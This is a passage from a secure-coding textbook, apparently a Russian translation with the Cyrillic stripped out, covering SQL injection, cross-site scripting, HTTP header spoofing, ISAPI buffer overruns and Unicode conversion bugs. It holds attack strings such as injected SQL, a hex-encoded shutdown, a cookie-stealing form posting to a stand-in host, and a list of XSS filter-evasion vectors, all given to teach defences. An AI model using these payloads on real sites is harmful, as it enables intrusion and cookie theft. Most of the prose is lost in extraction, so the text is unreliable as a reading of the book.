case 2 : enf = "NameSamCompatible"; break;
case 3 : enf = "NameDisplay"; break;
case 4 : enf = "NameUniqueId"; break;
case 5 : enf = "NameCanonical"; break;
case 6 : enf = "NameUserPrincipal"; break;
case 7 : enf = "NameUserPrincipal"; break;
case 8 : enf = "NameServicePrincipal"; break;
default : enf = "Unknown"; break;
}
BOOL fRet =
GetUserNameEx((EXTENDED_NAME_FORMAT)i,
szName,
&dwLen);
if (fRet) {
printf("%s '%s' .\n", szName, enf);
} else {
printf("%s %d\n", enf, GetLastError());
}
}
, :
.

11

341

,
. , ACL.

: 
, ,
. , .
, :
,
, .
,
.
, !

12

Web 
(). , Web XML Web
, , 
.
, Web, . ( 13
Web,
, .)
SQL;
.
2001 . Microsoft Professional Developers Con
ference ( Microsoft)
. 
Web . 
, 15 . 
, 
, , .
SQL, , 
, . 
,
,
.

, , .
: ,
, .
, ,
,
.

12

343


,
: , , 
,
. .
, (
,  ):

string sql = "select * from client where name = '" + name + "'"
name . ,
name SQL. ,
Blake, SQL:

select * from client where name = 'Blake'


, : Blake or 1=1 ? :

select * from client where name = 'Blake' or 1=1 !!


client, Blake,
name. , 1=1,
:
, 1=1 ,
. , ? ,
, . 121.
CustomerCreditCard*

Creditcard*

CustomerID

CreditCardID

CreditCardID

Type
Number
Expires

Customer*
CustomerID
LastName
FirstName
MiddleInitial
Address
Apartment
City
State
PostalCode
Country

. 121. ,

344

II

. , 
,
SQL. , SQL,
, 
, .
 ,
Microsoft SQL Server, IBM DB2, Oracle, PostgreSQL MySql.
, SQL (SQL injection).
SQL, 
, or. 
SQL, 
, .

SQL . ,
SQL Server :

select * from table1 select * from table2


SQL select.
,
SQL. 
, ,
: , , . ,
:

Blake' drop table client !!


SQL, Blake, 
.
SQL
Professional Developers Conference 2001 
, . 
, , , !
, , , 
, Web Web,
? :

string Status = "No";


string sqlstring = "";
try {
SqlConnection sql= new SqlConnection(
@"data source=localhost;" +
"user id=sa;password=password;");
sql.Open();
sqlstring="SELECT HasShipped" +
" FROM detail WHERE ID='" + Id + "'";
SqlCommand cmd = new SqlCommand(sqlstring,sql);
if ((int)cmd.ExecuteScalar() != 0)
Status = "Yes";

12

} catch (SqlException se)


Status = sqlstring + "
foreach (SqlError e in
Status += e.Message
}
} catch (Exception e) {
Status = e.ToString();
}

345

{
failed\n\r";
se.Errors) {
+ "\n\r";

C#? : SQL
,
SQL. . Web
sa, (sysadmin)
SQL Server.
: sa SQL Server , SYSTEM Windows NT
.
. sa Oracle
internal.
sa. : 
! , .
: SQL  
,
, SQL. , 
, ,
.

, .

1:

, 
, . , 
.

int age = ...; // , .


string name = ...; // , .
name = name.Replace("'","''");
SqlConnection sql= new SqlConnection(...);
sql.Open();
sqlstring=@"SELECT *" +
" FROM client WHERE name= '" + name + "' or age=" + age;
SqlCommand cmd = new SqlCommand(sqlstring,sql);
, , 
. , 
Michael or 1=1 , ( ) 

346

II

, ,
SQL:

select * FROM client WHERE ID = 'Michael'' or 1=1 !! ' or age=35



age, . , age 
35; shutdown . , . 
, (;) . 35 shutdown 
, , , ,
!
, , 
char(0x27), . :
, :

declare @a char(20) select @a=0x73687574646f776e exec(@a)


SQL,
shutdown. 
shutdown ASCII.
? SQL 
, !
! ( ) 
SQL.

2:
, ,
, SQL. ! 
, .
, sp_GetName:

string name = ...; // , .


SqlConnection sql= new SqlConnection(...);
sql.Open();
sqlstring=@"exec sp_GetName '" + name + "'";
SqlCommand cmd = new SqlCommand(sqlstring,sql);
Blake or 1=1 , 
(join) . SQL
:

exec sp_GetName 'Blake' or 1=1 !! '


:

exec sp_GetName 'Blake' insert into client values(1005, 'Mike') !! '


SQL Blake
! ,
SQL.

12

347

, , 
, :

CREATE PROCEDURE sp_MySProc @input varchar(128)


AS
exec(@input)
, ? , !
. ,
.
?
, .
.

1:

SQL Server 
(sysadmin)
Web Web. , 
.
Web 
.
Web 
,
.
SQL , ,
SQL, ,
, :
;
;
;
, ;
;
;
.
. 


. Trusted_Connection=True.
 ( ) 
,
,
. 
, 

.

348

II

,

. , SQL Server xp_cmdshell, 
. Oracle
utl_file,
.
sysadmin
.
. , 

. ,
!
, SQL.
, .

2:
SQL-
SQL , 
, .
SQL 
. (place
holder), (parameterized
command). , SQL
. :

SELECT count(*) FROM client WHERE name=? AND pwd=?


, 
SQL. VBScript 
:

Function IsValidUserAndPwd(strName, strPwd)


' , SQL Server.
' uid=sa;pwd=
strConn = "Provider=sqloledb;" + _
"Server=server!sql;" + _
"database=client;" + _
"trusted_connection=yes"
Set cn = CreateObject("ADODB.Connection")
cn.Open strConn
Set cmd = CreateObject("ADODB.Command")
cmd.ActiveConnection = cn
cmd.CommandText = _
"select count(*) from client where name=? and pwd=?"
cmd.CommandType = 1
' 1 adCmdText

12

349

cmd.Prepared = true
' :
' 200 (varchar, );
' 1 ( );
' ! 32 .
Set parm1 = cmd.CreateParameter("name", 200, 1, 32, "")
cmd.Parameters.Append parm1
parm1.Value = strName
Set parm2 = cmd.CreateParameter("pwd", 200, 1, 32, "")
cmd.Parameters.Append parm2
parm2.Value = strPwd
Set rs = cmd.Execute
IsValidUserAndPwd = false
If rs(0).value = 1 Then IsValidUserAndPwd = true
rs.Close
cn.Close
End Function
, , 
SQL. ,
: , !

. , ,
SQL, 
, .
ODBC , SQLNumParams
SQLBindParam. OLE DB ICommandWith
Parameters. , SqlCommand.



, Web.
.
, .
, quotename. ,
select top 3 name from mytable select top 3 [name] from
[mytable], name mytable. quotename
TransactSQL ( . 
SQL Server Books Online). , 
. ,
SQL Query Analyzer . 
, ASCII,
.

350

II

declare @a varchar(20)
set @a=0x74735D27
select @a
set @a=quotename(@a)
select @a
set @a='ts]'''
select @a
set @a=quotename(@a)
select @a
@a (ts] ).
, [ ].
, sp_executesql
SQL, . 
:

!! .
declare @name varchar(64)
set @name = N'White'
!! .
exec sp_executesql
N'select au_id from pubs.dbo.authors where au_lname=@lname',
N'@lname varchar(64)',
@lname = @name
SQL Server, ,
, , 
. ,
! :
, , .


,
,
( ). Web C# 
: , ,
.

//
// SafeQuery
//
using
using
using
using
using
using

System;
System.Data;
System.Data.SqlTypes;
System.Data.SqlClient;
System.Security.Principal;
System.Security.Permissions;

12

using
using
using
using

System.Text.RegularExpressions;
System.Threading;
System.Web;
Microsoft.Win32;

[SqlClientPermissionAttribute(SecurityAction.PermitOnly,
AllowBlankPassword=false)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\Client")]
static string GetName(string Id)
{
SqlCommand cmd = null;
string Status = "Name Unknown";
try {
// (ID).
Regex r = new Regex(@"^\d{4,10}$");
if (!r.Match(Id).Success)
throw new Exception(" ID");
// .
SqlConnection sqlConn= new SqlConnection(ConnectionString);
// ID!.
string str="sp_GetName";
cmd = new SqlCommand(str,sqlConn);
cmd.CommandType = CommandType.StoredProcedure;
cmd.Parameters.Add("@ID",Convert.ToInt64(Id));
cmd.Connection.Open();
Status = cmd.ExecuteScalar().ToString();
} catch (Exception e) {
if (HttpContext.Current.Request.UserHostAddress == "127.0.0.1")
Status = e.ToString();
else
Status = " ";
} finally {
// .
if (cmd != null)
cmd.Connection.Close();
}
return Status;
}
// .
internal static string ConnectionString {

351

352

II

get {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\Client\")
.GetValue("ConnectionString");
}
}

.

, 
.

; .
: 4 10 , . 
.
, Web
(, ).

, .
,
sa. , 
, 
.
, .
64
( ).
.
, .
, . ,
, .
.
, , 
(ID) 4 10 . 
^\d{4,10}$, 4 10
(\d{4,10}) (^) ($) .
,
: SQL
.
System.Text.RegularExpressions.
. ,
, SqlConnection, .
ConnectionString. , 
Web
.

12

353

data source=db007a;
user id=readuser;
password=&ugv4!26dfA!+8;
initial catalog=client
: db007a.
Web,
SQL.
sa, , 
readuser ( ) ,
SQL 
client. Web 

, master , 
, .
SQL

. ,
,
, 
.
, ( , )
, Web.
, Web,
, ! , 
:

AppDomain.CurrentDomain.SetPrincipalPolicy
(PrincipalPolicy.WindowsPrincipal);
WindowsPrincipal user = (WindowsPrincipal)Thread.CurrentPrincipal;
if (user.IsInRole(WindowsBuiltInRole.Administrator)) {
// ,
// .
}
, finally. try/catch
, ,
,
.

.
, .NET Framework
.
. ,
SQLClientPermissionAttribute, SQL Server .NET Data Provider
,

354

II

AllowBlankPassword false, .
SQL Server 
.
, RegistryPermissionAttribute, (
) (, ..). , 
Read @"HKEY_LOCAL_MACHINE\SOFTWARE\Shipping",
, 
. ,
.
, 
, . 
,
.

, , 
, , ,
SQL. , 
.
, !
,
. , , .
.
,
.
, .

, .

13

Web-

, ,
Web. , ,
Web . , 10
11, Web , 
12.
Web
. , Web,
, , . , 
, , 
. , : ,

, .
 ( ,
) HTTP, , 
SSL (Secure Sockets Layer) TLS (Transport
Layer Security). , !

- :

,  (crosssite scripting, XSS)
. ,
:  
Web. ,

356

II

Web  
. ?
:
Web , ;
Web , 
.
, :

Hello, &nbsp;
<%
Response.Write(Request.Querystring("name"))
%>
, name QueryString, 
www.contoso.com/req.asp?name=Blake. 
, , , 
, Web, 
? , , , ,
, :

<a href=www.contoso.com/req.asp?name=scriptcode>
$1 000 000</a>
scriptcode :

<script>x=document.cookie;alert(x);</script>
, , ,
. , :

<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69
%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C
%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B
%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E">
$1 000 000</a>
, www.microsoft.com, ! 
, URL: http://
< >:<>@<Web>. RFC 1738, Uniform
Resource Locators (URL) (ftp://ftp.isi.edu/innotes/rfc1738.txt). 
3.1. Common Internet Scheme Syntax ( ):
URL
, URL, 
IP 
, : //<>:<
>@<>:<>/<url>.
: URL .
URL: www.microsoft.com . ,
, Web, 
, ,
!

13 Web-

357

, ( XSS). name
, , HTML JavaScript,
, cookie, docu
ment.cookie. , cookie . ,
cookie, contoso.com, Web
, Web microsoft.com.
: ,
? , , 
, contoso.com,
cookie contoso.com. ,
, , 
, . 
cookie 
. ,  
, .
. 2001 . Web
passport.com , 
. Hotmail 
, passport.com,
Hotmail hotmail.passport.com. ,
cookie, Passport 
. cookie
 HTTP,
.
 cookie.
(poisoning). (plugin) 
(native) , (,
ActiveX SiteLock, 16), 
, 
. , 
.
(spoofing) . ,
XSS. , 

. , 
(. 131).
XSS
. 
3.
Web 
. , ,
. , Dynamic
HTML (DHTML) ,
 . 
.

358

II

<a href=http://www.contoso.com/req.asp?name=
<FORM action=http://www.badsite!sample!13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
!
</a>
, HTML
. , .
cookie Web.
!

SSL/TLS  .

XSS. 
,
(
). , 
,
, 
. , , Web, 
Web. ( 
querystring.) 
, , 
.

Web-



Web-


Web-

. 131.

XSS


Web-

,
(/ )

13 Web-

359

cookie XSS , ,
cookie, . , 
cookie , ,
, . ,
cookie.
XSS CrossSite Scripting
Overview (  ) (http://
www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp). 
Open Web Appli
cation Security Project (http://www.owasp.org).

<SCRIPT>
.
<script>,
Web.
.
, <img src> <a href>
, URL. , , 
:

<a href="javascript:alert(1);"> $1 000 000!</a>


<script> !


, : ,
,  . ,

.
, 
HTML. ,
:

<a href=<%= request.querystring("url")%>> </a>


? , URL
:

http://www.microsoft.com onmouseover="malicious!script"
onmouseover HTML. 
, 
. ,
onload onactivate. 
.  ?

360

II

, XSS

XSS: , HTML
, , Windows (CHM
), HTML. .

XSS-
XSS Web, ,
.
XSS HTML .
,
, , 
. 
. , 
CLYBG5EV, KDEJ41EB, ONWN
WXYR, W5U7GT63 ( CryptGenRandom).
. HTML
,  , 
, .
, HTML
URL . 
: localxss.html c:\webfiles:

<html>
<head>
<title> XSS!</title>
</head>
<body>
! &nbsp;
<script>document.write(location.hash)</script>
</body>
</html>
Web , 
(#) URL.
!:

file://C:\webfiles\localxss.html#<script>alert('!');</script>
, . 
My Computer ( ). (Microsoft Internet Explorer 
, .)
, , Internet (
), ,
My Computer. 
Internet Explorer, .
location.search location.href.

13 Web-

361

, , 
Internet Explorer ,
. Internet Explorer 6 SP1,
Microsoft Windows XP SP1 Microsoft Windows .NET Server 2003
,
Internet My Computer.
. 131: Web
Web , !


Internet Explorer 4 
. 
, . 
Web.
, Web

, . , 
. 
, ,
Web.
, 
. 
, 
,
. Internet Explorer : ( 
): My Computer ( ), Trusted Sites ( ), Local
Intranet ( ), Internet () Restricted Sites (
).

HTML Help Windows


Windows HTML Help
XSS. HTML Help HTML, 
CHM. CHM
Microsoft HTML Help Workshop. 
http: mk:. , CHM 
XSS. HTML ,
HTML.

HTML-
HTML , , .
Internet Explorer res:,
( , HTML) DLL
, EXE . , res://mydll.dll/#23/
ERROR HTML ( #23) ERROR

362

II

mydll.dll. ERROR URL ,


XSS. , HTML
HTML.
2002 . Microsoft ,
XSS, (. 28 March
2002 Cumulative Patch for Internet Explorer http://www.micro
soft.com/technet/security/bulletin/MS02015.asp).
, Windows, Windows Explorer,
res:, DLL.
HTML, , 
XSS.

XSS-
, ,
XSS ,
. ( ?)
,
. ,
. XSS
SQL
, 
.
(
):
;
;
innerText;
;
HttpOnly cookie Internet Explorer 6 SP1;
Internet Explorer;
<FRAME SECURITY> Internet Explorer;
ValidateRequest ASP.NET 1.1.
( ) 
, , , 
,
. .


. , 
Server. HTMLEncode ASP HttpServerUtility. HTML
Encode ASP.NET. ,
HTML, , <
&lt;.

13 Web-

363


HTML, ,
. , www.contoso.com/product.asp?id=210502
ASP:

<a href=http://www.contoso.com/detail.asp?id=<%= request.querystring("id") %>>


HTML:

<a href=http://www.contoso.com/detail.asp?id=2105>
, id, 
<a> <script>.
id : 2105><script event=onload>exploitcode
</script>.
<a>, 
. , 2105 onclick="exploitcode" <a>, 
onclick, , exploit.
, 
, , :

<a href="http://www.contoso.com/
detail.asp?id=<%= Server.HTMLEncode (request.querystring("id")) %>">
, 
href. id,
, detail.asp
id, , id. , 2105
onclick=exploitcode :

<a href="http://www.contoso.com/detail.asp?2105 onclick='exploitcode'">


, Contoso 2105 onclick=
exploitcode.
, ? , HTML
.

innerText
innerText , 
, 
. :

<html>
<body>
<span id=spnTest></span>
</body>
</html>
<script for=window event=onload>
spnTest.innerText = location.hash;
</script>

364

II

HTML URL, ,
, .

file://C:\webfiles/xss.html#<script>alert(1);</script>
innerHTML
. !


Web
, .
, , <meta>,
Web 
:

<meta http!equiv="Content!Type" content="text/html; charset=iso!8859!1">



, : ,
, , , , , , 
, , , , , , ,
, . 
ISO8859:
88592 ;
88593  ;
88594 ( 88591);
88595 ;
88596 ;
88597 ;
88598 .

HttpOnly cookie-
Internet Explorer 6 SP1
Windows Security Push ,
Internet Explorer, XSS, cookie
, cookie
HttpOnly. , cookie DHTML
Internet Explorer 6 SP1:

Set!Cookie: name=Michael; domain=Microsoft.com; HttpOnly


, , 
, document.cookie. 
ISAPI, ,
cookie Web
IIS (Internet Information Services).

13 Web-

365

// ISAPI! "HttpOnly"
DWORD WINAPI HttpFilterProc(
PHTTP_FILTER_CONTEXT pfc,
DWORD dwNotificationType,
LPVOID pvNotification) {
// cookie! ! 2k
CHAR szCookie[2048];
DWORD cbCookieOriginal = sizeof(szCookie) / sizeof(szCookie[0]);
DWORD cbCookie = cbCookieOriginal;
HTTP_FILTER_SEND_RESPONSE *pResponse =
(HTTP_FILTER_SEND_RESPONSE*)pvNotification;
CHAR *szHeader = "Set!Cookie:";
CHAR *szHttpOnly = "; HttpOnly";
if (pResponse!>GetHeader(pfc,szHeader,szCookie,&cbCookie)) {
if (SUCCEEDED(StringCchCat(szCookie,
cbCookieOriginal,
szHttpOnly))) {
if (!pResponse!>SetHeader(pfc,
szHeader,
szCookie)) {
// cookie!!
pResponse!>SetHeader(pfc,szHeader,"");
}
} else {
pResponse!>SetHeader(pfc,szHeader,"");
}
}
return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
ASP.NET:

HttpCookie cookie = new HttpCookie("Name", "Michael");


cookie.Path = "/; HttpOnly";
Response.Cookies.Add(cookie);
HttpOnly cookie . 
,
Application_OnPreSendRequestHeaders global.asax.
ASP:

response.addheader("Set!Cookie","Name=Mike; path=/; HttpOnly; Expires=" + CStr(Now))


! HttpOnly
, cookie.
cookie . 
cookie .

366

II


XSS  HTML. Internet Explorer
HTML , My Computer. 
, , Internet Explorer 4.0,
, , , ,
Web .
. 132 msdn.microsoft.com ,
My Computer, Internet,
.

. 132. MSDN,
Internet, My Computer
:

<!!! saved from url=(0026)http://msdn.microsoft.com/ !!>


, Internet Explorer saved from url
Internet. 
, Internet ( ), 
My Computer, Web. (0026) 
URL.
Web
, Web. , 
,
. HTML 
HTML .

13 Web-

367

<FRAME SECURITY> Internet Explorer


Internet Explorer 6 SECURITY
<FRAME>, 
. SECURITY
frame iframe. , :

<IFRAME SECURITY="restricted" src="http://www.contoso.com"></IFRAME>


Restricted Sites, 
. Web
! SECURITY, 
.
,
. , 
Internet Explorer, .

<FRAME SECURITY> restricted.

ValidateRequest ASP.NET 1.1


ASP.NET 1.1, 
, XSS, 
ASP.NET , XSS. ! 
, , 
XSS . 
. , .
,
HTML cookie (HttpRequest.Cookies), 
(HttpRequest.QueryString) HTML (HttpRequest.Form).
, HttpRe
questValidationException.
:

<%@ ValidateRequest="False" %>


:

<!!!

:
machine.config web.config

<location>, <system.web>

!!>
<configuration>
<system.web>
<pages validateRequest="true"/>
</system.web>
</configuration>
, true, ,
.

368

II


, Web, 
, HTML,
, Web <IMG>
<TABLE>. HTML , .
.  ,
. 
:
<img src=javascript:alert([])>
<link rel=stylesheet href="javascript:alert(([])">
<input type=image src=javascript:alert(([])>
<bgsound src=javascript:alert(([])>
<iframe src="javascript:alert(([])">
<frameset onload=vbscript:msgbox(([])></frameset>
<table background="javascript:alert(([])"></table>
<object type=text/html data="javascript:alert(([]);"></object>
<body onload="javascript:alert(([])"></body>
<body background="javascript:alert(([])"></body>
<p style=left:expression(alert(([]))>
, http://online.securityfocus.com/archive/1/
272037:
<a href="javas&#99;ript&#35;[]">
<div onmouseover="[]">
<img src="javascript:[]">
<img dynsrc="javascript:[]">
<input type="image" dynsrc="javascript:[]">
<bgsound src="javascript:[]">
&<script>[]</script>
&{[]};
<img src=&{[]};>
<link rel="stylesheet" href="javascript:[]">
<iframe src="vbscript:[]">
<img src="mocha:[]">
<img src="livescript:[]">
<a href="about:<s&#99;ript>[]</script>">
<meta httpequiv="refresh" content="0;url=javascript:[]">
<body onload="[]">
<div style="backgroundimage: url(javascript:[]);">
<div style="behaviour: url([ ]);">
<div style="binding: url([ ]);">
<div style="width: expression([]);">

13 Web-

369

<style type="text/javascript">[]</style>
<object classid="clsid:..." codebase="javascript:[]">
<style><!</style><script>[]//></script>
<![CDATA[<!]]><script>[]//></script>
<!  ><script>[]</script><!  >
<<script>[]</script>
<img src="blah"onmouseover="[]">
<img src="blah>" onmouseover="[]">
<xml src="javascript:[]">
<xml id="X"><a><b>&lt;script>[]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[] [\xC0][\xBC]/script>
.
Internet Explorer, Netscape Navigator, Mozilla Opera,
. , 
.
HTML.
, ,
, JScript,
JScript
. VBScript,
?
HTML .
, jscript:, vbscript: javascript:?
Netscape Navigator livescript: mocha:
, &{}!
, , , 
HTML, 
 .
, .

,
HTML Web-
HTML, 
 . HTML 
, 
. <EM>,
<PRE>, <BR>, <P>, <I></I> <B></B> ,
.
, :

if (/^(?:[\s\w\?\!\,\.\'\"]*|(?:\<\/?(?:i|b|p|br|em|pre)\>))*$/i) {
# , !
}

370

II

(\s),  
AZ, az, 09 (\w), 
(<) 
(/), i, b, p, pr, em pre
(>). i 
. ,
HTML. , Hello, </i>World!<i>
, HTML, 
.
! , HTML .
, 
. 
, 
(http://www.distributed.net), 2002 . 
. , 
, , , http://n0cgi.distribu
ted.net/faq/cache/268.html. , , URL
n<>cgi.

XSS-
,
XSS.
1. Web. ,
, querystring, HTTP, cookie 
.
2. .
3. , .
4. , ?
, , ,

, (
), ,  
 . , 
, .

.
, , innerHTML docu
ment.write.
Web 
HTML Form Protocol Attack (
HTML),
. , , 
http://www.remote.org/jochen/sec/hfpa/hfpa.pdf.

13 Web-

371

Web
, Web
. ,
Microsoft, 
.

- eval()
, JavaScript
eval ( ), 
. eval ,
JavaScript, 
. ,

eval("a=42; b=69; document.write(a+b);");


111. , ,
eval !

HTTP
HTTP HTTP, 
. , 

. Web
REFERER, cookie
, .

REFERER
REFERER HTTP, Web
URL Web, . Web

(spoofing), REFERER .
, ASP:

<%
strRef = Request.ServerVariables("HTTP_REFERER")
If strRef = "http://www.northwindtraders.com/login.html" Then
' , Login.html!
' ! .
End If
%>
Perl , REFERER HTTP
, Login.html:

use HTTP::Request::Common qw(POST GET);


use LWP::UserAgent;
$ua = LWP::UserAgent!>new();
$req = POST 'http://www.northwindtraders.com/dologin.asp',

372

II

Username => 'mike',


Password => 'mypa$w0rd',

];
$req!>header(Referer => 'http://www.northwindtraders.com/login.html');
$res = $ua!>request($req);
, Login.html, !
, 
REFERER, . 
. : 
, , ,
.
, Web
: REFERER , ,
!

ISAPI
ISAPI
: 
.
, 
, ISAPI. ,
IIS 5 Inetinfo.exe,
SYSTEM. : DLL, 
SYSTEM, ,
. 
, , 
ISAPI C C++.
IIS 6  , 
SYSTEM, , ,
.

ISAPI
IPP (Internet Printing Protocol). http://www.mic
rosoft.com/technet/security/bulletin/MS01023.asp.
, ,
lpECB>GetServerVariable, HTTP
IIS. , lpdwSizeofBuffer
, , , 
, , , 
Unicode ANSI. 
IPP.

13 Web-

373

TCHAR g_wszHostName[MAX_LEN + 1];


BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
DWORD dwSize = sizeof(g_wszHostName);
char szHostName[MAX_LEN + 1];
// .
pECB!>GetServerVariable(pECB!>ConnID,
"SERVER_NAME",
szHostName,
&dwSize);
// ANSI Unicode.
MultiByteToWideChar(CP_ACP,
0,
(LPCSTR)szHostName,
!1,
g_wszHostName,
sizeof (g_wszHostName));
, ? , : 
#define UNICODE, TCHAR . ?
UNICODE ANSI; , g_wszHostName
szHostName MAX_LEN + 1, .
TCHAR WCHAR, ,
g_wszHostName MAX_LEN + 1 UNICODE. 
dwSize (MAX_LEN + 1) sizeof (WCHAR) ,
sizeof(WCHAR) Windows 2 . g_wszHostName
szHostName, . 
dwSize GetServerVariable DWORD,
, g_wszHostName,
, szHostName, szHost
Name, , sizeof(szHostName). ,
, szHostName
GetHostName , , .
dwSize 
WCHAR TCHAR.

WCHAR g_wszHostName[MAX_LEN + 1];


BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
char szHostName[MAX_LEN + 1];
DWORD dwSize = sizeof(szHostName);
// .
pECB!>GetServerVariable(pECB!>ConnID,
"SERVER_NAME",
szHostName,
&dwSize);

374

II

// ANSI Unicode.
MultiByteToWideChar(CP_ACP,
0,
(LPCSTR)szHostName,
!1,
g_wszHostName,
sizeof (g_wszHostName) / sizeof(g_wszHostName[0]));
IIS 6 : IPP ,
, ,
.
:
ISAPI;
ISAPI;
Unicode ANSI.
ISAPI;
;
, ,
. 
.

cookie-
cookie , , 
, .
, , 
, .
, cookie
, . 
cookie HTML , 
. 5% 50%,
Web !
cookie
, : 
HTML, 
Web.

Element N.V. Element InstantShop. http://
www.securityfocus.com/bid/1836.
: cookie, 
, .
, 
MAC cookie ,
.
, , Web.
, ,
. , ! MAC 6.

13 Web-

375

cookie-
. 
Web .
cookie.
, HTTP ,
cookie. cookie
RFC 2965 HTTP State Management Mechanism (
HTTP) (http://www.ietf.org/rfc/rfc2965.txt).
Web 
, , 
.
cookie,
, 
. , 
cookie. , :
SSL. SSL , cookie
. 32 , 

. , SSL 
cookie, Web. , 0005F1CC.
,
cookie 0005F1CE. 0005F1CF.
: cookie ,
,  
. , cookie 0005F1CD. 
, Cookie: 0005F1CD
, 
. ! ,
,
,
.
: cookie 
. cookie 
. 8. SSL, 
(, ).

SSL/TLS
,
, , 
SSL. SSL, ,
, TLS, , .
:
;
;
.

376

II

,
. :
. 
, SSL/TLS;
, 
.
,
SSL/TLS,
.
, , 
, Subject ()
X.509, , .
WinInet, WinHTTP System.Net .NET
Framework . , 
.

 XSS Web ,
. 
, 
. Web
. 
Web, HTML HTML
XSS.

14

, ,
, . ,
,
( ) . 
, Unicode .  
. , 
Windows Security Push,
, ,
.

I18N.
internationalization ( i, n, 18 
), .

, . , ,
10 11. , , ,
, , I18N
. .

378

II

I18N
I18N, :
Unicode;
Unicode
.
,
. , , 
, ! 
I18N .

Unicode
(A, , ) 
( ), 
(code point). ,
Microsoft Windows . 
, Unicode , , 
 . Unicode
, .
Microsoft Windows Microsoft Office Unicode,
, , ,
Unicode. CLR .NET Framework
Unicode.
Unicode:
UTF8, UTF16 UTF32. 
, UTF16, 
Windows .NET. 
, . UTF8
, Windows, .
Windows (National Langu
age Support, NLS) API
UTF8 UTF16, : MultiByteToWideChar
WideCharToMultiByte. UTF32 ,
.


- I18N
, 
.
.

// ,
// .

14

379

// \0.
int nLen = MultiByteToWideChar(CP_OEMCP,
MB_ERR_INVALID_CHARS,
lpszOld, !1, NULL, 0);
// , !
if (nLen == 0) {
// , !
}
// .
LPWSTR lpszNew = (LPWSTR) GlobalAlloc(0, sizeof(WCHAR) * nLen);
// ,
// !
if (lpszNew == NULL) {
// , !
}
// .
nLen = MultiByteToWideChar(CP_OEMCP,
MB_ERR_INVALID_CHARS,
lpszOld, !1, lpszNew, nLen);
// ,
// .
if (nLen == 0) {
// , !
}

. , GB18030,
4 , 
.
LCMapString : 
, , LCMAP_SORTKEY.
, Unicode
, Creating Arbitrary Shellcode in Unicode
Expanded Strings (http://www.nextgenss.com/papers/unicodebo.pdf) 
Unicode.


, Win32 
. ( CreateProcessA), 
, Unicode
, Win32 W ( CreateProcessW) 
16 ,
.
.

380

II

A W 
Windows. winbase.h
.

#ifdef UNICODE
#define CreateProcess CreateProcessW
#else
#define CreateProcess CreateProcessA
#endif // !UNICODE

Unicode
Unicode (surrogate pair)
,
Unicode. , ,
16 U+D800 U+DBFF.
, , U+DC00 U+DFFF.
Unicode (combining character)
.
, . 
http://www.unicode.org.
, :
, , 16
UTF16 
. 16 Unicode
, .
Unicode .

I18N
, Unicode 
. , , 
, ,
, URL.
,
.
Microsoft, Windows .NET Server 2003 IsNLSDefinedString,
, Unicode.
IsNLSDefinedString True, :
, CompareString (,
). 
.


Unicode
. , 3.log Unicode (3. log),
ASCII. ,

14

381

. 
, .
(
).


LCMapString
LCMapString (
), .
LCMapString 
. , LCMapString
, . 
, LCMapString .
, IsNLSDefinedString,
.


CreateFile
CompareString ( 
) : .
, , CompareString ,
NTFS , .
. , 
, ,
CreateFile .



. 
. ,
ISO 88598E ( )
UTF16,
950 (Big5, ) 
 UTF16.
, .
, ,
, .
UTF8 Windows XP
MultiByteToWideChar WideCharToMultiByte. 
UTF8 UTF16 ,
. 
, .
Windows 
.
Microsoft MultiByteToWideChar

382

II

WideCharToMultiByte 
. ,
, .

MultiByteToWideChar
MB_PRECOMPOSED MB_ERR_INVALID_CHARS
MultiByteToWideChar MB_PRECOMPOSED.
( )
. . 
50000, MB_ERR_INVALID_CHARS
. 
50000 MultiByteToWideChar , 
, .
MB_ERR_INVALID_CHARS 
.
MSDN.
Windows XP, MB_ERR_INVALID_CHARS 
UTF8 ( 65001, CP_UTF8).

WideCharToMultiByte
WC_NO_BEST_FIT_CHARS
, (,
, ), WC_NO_BEST_
FIT_CHARS. ,
. 
. , ( 
) 8 ()!
WC_NO_BEST_FIT_CHARS Microsoft Windows 2000/XP
Microsoft Windows .NET Server 2003. 
, 
, WideCharToMultibyte, UTF
16, MultiByteToWideChar
. 
( ), ,
. 
.

/*
RoundTrip.cpp : .
*/
#include "stdafx.h"

14

/*
CheckRoundTrip
TRUE
Unicode .
FALSE.
*/
BOOL CheckRoundTrip(
DWORD uiCodePage,
LPWSTR wszString)
{
BOOL fStatus = TRUE;
BYTE *pbTemp = NULL;
WCHAR *pwcTemp = NULL;
try {
// , MAX_STRING_LEN
//
const size_t MAX_STRING_LEN = 200;
size_t cchCount = 0;
if (!SUCCEEDED(StringCchLength(wszString,
MAX_STRING_LEN, &cchCount)))
throw FALSE;
pbTemp = new BYTE[MAX_STRING_LEN];
pwcTemp = new WCHAR[MAX_STRING_LEN];
if (!pbTemp || !pwcTemp) {
printf(": !\n");
throw FALSE;
}
ZeroMemory(pbTemp,MAX_STRING_LEN * sizeof(BYTE));
ZeroMemory(pwcTemp,MAX_STRING_LEN * sizeof(WCHAR));
// Unicode .
int rc = WideCharToMultiByte( uiCodePage,
0,
wszString,
!1,
(LPSTR)pbTemp,
MAX_STRING_LEN,
NULL,
NULL );
if (!rc) {
printf(": WC2MB = %d, CodePage = %d,
String = %ws\n",
GetLastError(), uiCodePage, wszString);
throw FALSE;
}

383

384

II

// Unicode.
rc = MultiByteToWideChar(uiCodePage,
0,
(LPSTR)pbTemp,
!1,
pwcTemp,
MAX_STRING_LEN / sizeof(WCHAR) );
if (!rc) {
printf(": MB2WC = %d,
CodePage = %d, String = %ws\n",
GetLastError(), uiCodePage, wszString);
throw FALSE;
}
// Unicode!,
// .
size_t Length = 0;
